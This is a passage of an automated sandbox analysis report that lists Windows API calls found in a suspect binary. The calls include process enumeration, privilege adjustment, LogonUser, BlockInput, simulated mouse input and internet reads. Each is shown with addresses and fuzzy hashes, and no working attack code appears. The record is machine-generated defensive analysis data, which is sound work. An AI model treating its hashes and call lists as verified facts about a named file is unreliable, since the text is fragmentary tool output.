                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6ADA
                              • bind.WSOCK32(00000000,?,00000010), ref: 008F6B13
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6B20
                              • closesocket.WSOCK32(00000000,00000000), ref: 008F6B34
                              Similarity
                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                              • String ID:
                              • API String ID: 99427753-0
                              • Opcode ID: 91812a7dc531383d6bad1de2dc7fc7b2676e38f90ac0d3c8d40efa01db8d12f6
                              • Instruction ID: f0fe22ede7d23ad6a7c39010756491a8fef9f0fabe8e83aaddd3bb4528cefa54
                              • Opcode Fuzzy Hash: 91812a7dc531383d6bad1de2dc7fc7b2676e38f90ac0d3c8d40efa01db8d12f6
                              • Instruction Fuzzy Hash: 0741A275600214AFEB10BF68DC86F7E77A9FB44720F448158FA5AEB3D2DA709D018792
                              APIs
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                              • Instruction ID: f0f083a82193cec9d8fa22e8d2a4e609d0dac43c137d98f2fd579798047a5cfd
                              • Opcode Fuzzy Hash: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                              • Instruction Fuzzy Hash: EF11C4323009256FE7216F26DC54A2F7B9CFF84721B464429F846D7281CB319E01CEA5
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008C1D88,?), ref: 008FC312
                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008FC324
                              Strings
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                              • API String ID: 2574300362-1816364905
                              • Opcode ID: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                              • Instruction ID: 604852f38ee592954309cdb01875c62051f94de7a376020da725001eecddba10
                              • Opcode Fuzzy Hash: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                              • Instruction Fuzzy Hash: 41E08C7421430BCFCB344B75C814A9676D8FB48388F808439EA85C2750E770D940CAB0
                              Similarity
                              • API ID: __itow__swprintf
                              • String ID:
                              • API String ID: 674341424-0
                              • Opcode ID: 27c3a95bb41e9deaf382e97160707507861204ec5a4956e83517d789360af30c
                              • Instruction ID: 0f64f7cce2e68cd74034a9c6162d10fdafa6899310514f84197411b6a2a13578
                              • Opcode Fuzzy Hash: 27c3a95bb41e9deaf382e97160707507861204ec5a4956e83517d789360af30c
                              • Instruction Fuzzy Hash: 362268716083019FDB24EF68C881B6AB7E4FF88704F18491DF59AD7291DB71EA04CB92
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 008FF151
                              • Process32FirstW.KERNEL32(00000000,?), ref: 008FF15F
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • Process32NextW.KERNEL32(00000000,?), ref: 008FF21F
                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 008FF22E
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                              • String ID:
                              • API String ID: 2576544623-0
                              • Opcode ID: 99239b2f968f42b51fbf747932aadfa12ea93d5818a776461b4eec6e03db68c4
                              • Instruction ID: eeb23ea4bb59cb64b4c3d1844afae1e77c74e00bd917dc20586f8228e50e3678
                              • Opcode Fuzzy Hash: 99239b2f968f42b51fbf747932aadfa12ea93d5818a776461b4eec6e03db68c4
                              • Instruction Fuzzy Hash: A7515B715083109FD310EF24D885A6BB7E8FF94710F14482DF595D6252EB70AA08CB92
                              APIs
                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008E40D1
                              • _memset.LIBCMT ref: 008E40F2
                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008E4144
                              • CloseHandle.KERNEL32(00000000), ref: 008E414D
                              Similarity
                              • API ID: CloseControlCreateDeviceFileHandle_memset
                              • String ID:
                              • API String ID: 1157408455-0
                              • Opcode ID: 4cb568ede2837ed9a5297393f7fd52d50143e8af35230485a965dee9cec3585d
                              • Instruction ID: 7d9303ee35fdef8691bfec05cc0e813129b833a8360a7d0037b2ea4aa36b2357
                              • Opcode Fuzzy Hash: 4cb568ede2837ed9a5297393f7fd52d50143e8af35230485a965dee9cec3585d
                              • Instruction Fuzzy Hash: A911A7759012287AE7309BA5AC4DFABBB7CEF45760F1041AAF908E7180D6744F808BA4
                              APIs
                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008DEB19
                              Strings
                              Similarity
                              • API ID: lstrlen
                              • String ID: ($|
                              • API String ID: 1659193697-1631851259
                              • Opcode ID: 58c51242e1d86708146073ac6b385934d291036879ff0183796358f90f458dab
                              • Instruction ID: 46a1e3cd3c24c9d014092d7acd8b55ca50340f64fbf261781298f415aa3f28c4
                              • Opcode Fuzzy Hash: 58c51242e1d86708146073ac6b385934d291036879ff0183796358f90f458dab
                              • Instruction Fuzzy Hash: DC323675A007059FD728DF19C481A6AB7F1FF48320B15C56EE89ADB7A2EB70E941CB40
                              APIs
                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008F26D5
                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 008F270C
                              Similarity
                              • API ID: Internet$AvailableDataFileQueryRead
                              • String ID:
                              • API String ID: 599397726-0
                              • Opcode ID: b12a9c4d50549445c241f8110ac5733bdb9e62c0f93557afcd276233a33ca400
                              • Instruction ID: 1ebc059d6d36ae82cf4847e273beb382488f67c75115a7fa242db520b05c3283
                              • Opcode Fuzzy Hash: b12a9c4d50549445c241f8110ac5733bdb9e62c0f93557afcd276233a33ca400
                              • Instruction Fuzzy Hash: 6C41D67150420DBFEB20EEA4DC85EBBB7BCFB50728F10406AF701E6540EA759E419765
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EB5AE
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008EB608
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008EB655
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID:
                              • API String ID: 1682464887-0
                              • Opcode ID: 6ac2135a325950ffb9ad0ff9a6bd73a342df7956a07644147dad9fe03821726c
                              • Instruction ID: ba4849fac02fc80a57baa4ab40d80927cde59a60f092e90a0abdc685a78c85e1
                              • Opcode Fuzzy Hash: 6ac2135a325950ffb9ad0ff9a6bd73a342df7956a07644147dad9fe03821726c
                              • Instruction Fuzzy Hash: 88216235A10518EFCB00EF99D880EADBBB8FF49310F1480A9E945EB351DB319915CB51
                              APIs
                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                              • GetLastError.KERNEL32 ref: 008D8D47
                              Similarity
                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                              • String ID:
                              • API String ID: 1922334811-0
                              • Opcode ID: 408a3513d7e102b34dae0e27a7e4081a8bf384fdc2a44eacda0393155d2f47a3
                              • Instruction ID: 4dea8d3bc023855cf9233ee4e7f638eeb88d9161ff8f89d8681e5a67011aee1d
                              • Opcode Fuzzy Hash: 408a3513d7e102b34dae0e27a7e4081a8bf384fdc2a44eacda0393155d2f47a3
                              • Instruction Fuzzy Hash: 7F116AB1414209AFE728AF68DC85D6BB7BDFB44710B20862EF456D3681EF70B9408A60
                              APIs
                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008E4C2C
                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E4C43
                              • FreeSid.ADVAPI32(?), ref: 008E4C53
                              Similarity
                              • API ID: AllocateCheckFreeInitializeMembershipToken
                              • String ID:
                              • API String ID: 3429775523-0
                              • Opcode ID: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                              • Instruction ID: 655602456e46edac43fae564d061945e5cb132b1a8263de23b9e76bd955d4cf3
                              • Opcode Fuzzy Hash: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                              • Instruction Fuzzy Hash: 98F04975A1130CBFDF04DFF0DC99AAEBBBCEF08701F1044A9A901E2581E6746B049B50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c332554d1082582fdd17439a9c6c422ea6b11d5b94def0a19757f9981f946195
                              • Instruction ID: 90fa86edfb64120adfe70a14aba70167cf823af34b6afa6ce5708078adb9a76f
                              • Opcode Fuzzy Hash: c332554d1082582fdd17439a9c6c422ea6b11d5b94def0a19757f9981f946195
                              • Instruction Fuzzy Hash: C922AD74A0021ADFDB24EF58C484AAEB7F0FF09314F148469E856EB351E774AD81CB91
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 008EC966
                              • FindClose.KERNEL32(00000000), ref: 008EC996
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 1547b2f9340917107d4bd9e5a8b3b34101afc7cc32b0940641dbd27417b5ed43
                              • Instruction ID: eba21e8c39207c31a94af71368b2e093c1316a3a561ed9a0c0564d606ce86f34
                              • Opcode Fuzzy Hash: 1547b2f9340917107d4bd9e5a8b3b34101afc7cc32b0940641dbd27417b5ed43
                              • Instruction Fuzzy Hash: E21161726146149FD710EF29D845A2AFBE9FF85324F04851EF9AAD7291DB30AD01CB81
                              APIs
                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA302
                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA314
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorFormatLastMessage
                              • String ID:
                              • API String ID: 3479602957-0
                              • Opcode ID: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                              • Instruction ID: 58dad320df8c992829107783b7b1fae109452f4aa695f4e3557c68832f7abefb
                              • Opcode Fuzzy Hash: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                              • Instruction Fuzzy Hash: A9F0893555521DABDB209FA4CC88FEA776DFF09761F004155B918D6241D630A940CBA1
                              APIs
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                              • CloseHandle.KERNEL32(?,?,008D8851), ref: 008D873A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AdjustCloseHandlePrivilegesToken
                              • String ID:
                              • API String ID: 81990902-0
                              • Opcode ID: d26d002edc7ed7c241d3294c2e7909968b9e5dbc7f6dab8df7108a1530ffc28f
                              • Instruction ID: 57e5a85d86065507219fe6d0608132bf973328a944147874bce2b3c10ef337e8
                              • Opcode Fuzzy Hash: d26d002edc7ed7c241d3294c2e7909968b9e5dbc7f6dab8df7108a1530ffc28f
                              • Instruction Fuzzy Hash: F1E0BF75014610EEEB352B64EC09D7777A9FB04790B158529F466C0870DB615C90EB10
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008A8F97,?,?,?,00000001), ref: 008AA39A
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008AA3A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                              • Instruction ID: 9d347e03e5b74be8134238d89a5eea68c94aab785514f3cc65498f40629212e8
                              • Opcode Fuzzy Hash: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                              • Instruction Fuzzy Hash: 10B0923106C208AFCA102B91EC19B883FA8EB45BF2F404020F60D84860CB625650AA91
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                              • Instruction ID: 65987276f42022e0a750be6b3a5490b3a71675218fe40503b27c9ce94a88d9d9
                              • Opcode Fuzzy Hash: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                              • Instruction Fuzzy Hash: 8D320321E6DF024DE7239674D832335A259EFB73D4F15D737E81AB5DA6EB2884839100
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                              • Instruction ID: ddc30f19c8aee4f91f0484c61645ba571ed60dc6cf1a6b31c22af6b96fe4dcc9
                              • Opcode Fuzzy Hash: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                              • Instruction Fuzzy Hash: BAB1EF20E3AF514DD32396398831336BA5CAFBB2D5F51D71BFC2674E62EB2189839141
                              APIs
                              • __time64.LIBCMT ref: 008E8B25
                                • Part of subcall function 008A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008E91F8,00000000,?,?,?,?,008E93A9,00000000,?), ref: 008A5443
                                • Part of subcall function 008A543A: __aulldiv.LIBCMT ref: 008A5463
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Time$FileSystem__aulldiv__time64
                              • String ID:
                              • API String ID: 2893107130-0
                              • Opcode ID: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                              • Instruction ID: 208fc7cad908d448cc8ece66c0e46d7de1d0b5fc40cb080be009d51134e080d3
                              • Opcode Fuzzy Hash: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                              • Instruction Fuzzy Hash: A221EB72539510CFC729CF25D441A52F3E1EBA5321B288E6CD0E9CF1D0CA74B945DB54
                              APIs
                              • BlockInput.USER32(00000001), ref: 008F4218
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                              • Instruction ID: 848c49be8b5b061208c4d27530ff1574a74bfda4f49a54b6c27f9b9fd4ee3148
                              • Opcode Fuzzy Hash: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                              • Instruction Fuzzy Hash: F8E01A312502189FC710AF69D844AAAB7E8FF94760F048026F94AC7752DA71A8408BA1
                              APIs
                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008E4EEC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: mouse_event
                              • String ID:
                              • API String ID: 2434400541-0
                              • Opcode ID: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                              • Instruction ID: f875ca3de9013b8bc52489da072f306a1cb6411a347e677351af8000ac021b73
                              • Opcode Fuzzy Hash: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                              • Instruction Fuzzy Hash: 3CD05E9816478B39EC684B279C5FF770208F3037A5FD0714AB10AC94C1D8D16C506031
                              APIs
                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008D88D1), ref: 008D8CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                              • Instruction ID: 5d24131771877721f1f99df45e9c99aaab165559e3e4a7ba93d32db8b102197b
                              • Opcode Fuzzy Hash: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                              • Instruction Fuzzy Hash: 70D05E3226450EAFEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D935AB60
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 008C2242
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                              • Instruction ID: 99a9eaddc48583a74855bcbed1ac1434fd29dfbcf67e4b94dd27032207899883
                              • Opcode Fuzzy Hash: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                              • Instruction Fuzzy Hash: 30C04CF1C1410DDBDB15DB90DA98DEE77BCBB04314F104055A101F2101D7749B449E71
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008AA36A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                              • Instruction ID: 3839de2d887679ae65c6d4375d6ab527ffb68ddb97dc360c686ca4555ebd2467
                              • Opcode Fuzzy Hash: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                              • Instruction Fuzzy Hash: 09A0123001810CABCA001B41EC044447F9CD6002E07004020F40C40421873255105580
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                              • Instruction ID: 49436220916ba4a93e9735d98c5acfe112700b86a00de61bc27d97296e9f196d
                              • Opcode Fuzzy Hash: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                              • Instruction Fuzzy Hash: 6822147060561BCBDF28AB28C49467DB7A1FB03318F6C896BD842DB291DB34DD81DB61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                              • Instruction ID: 2930c4a4e45338056cf2d74959c7bbe166d6d108fd167c5094990ccb8751adeb
                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                              • Instruction Fuzzy Hash: 31C172322051A309FF6D863D943413EBAE1BAA37B171A076DE4B3CB9D5EF20D564D620
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
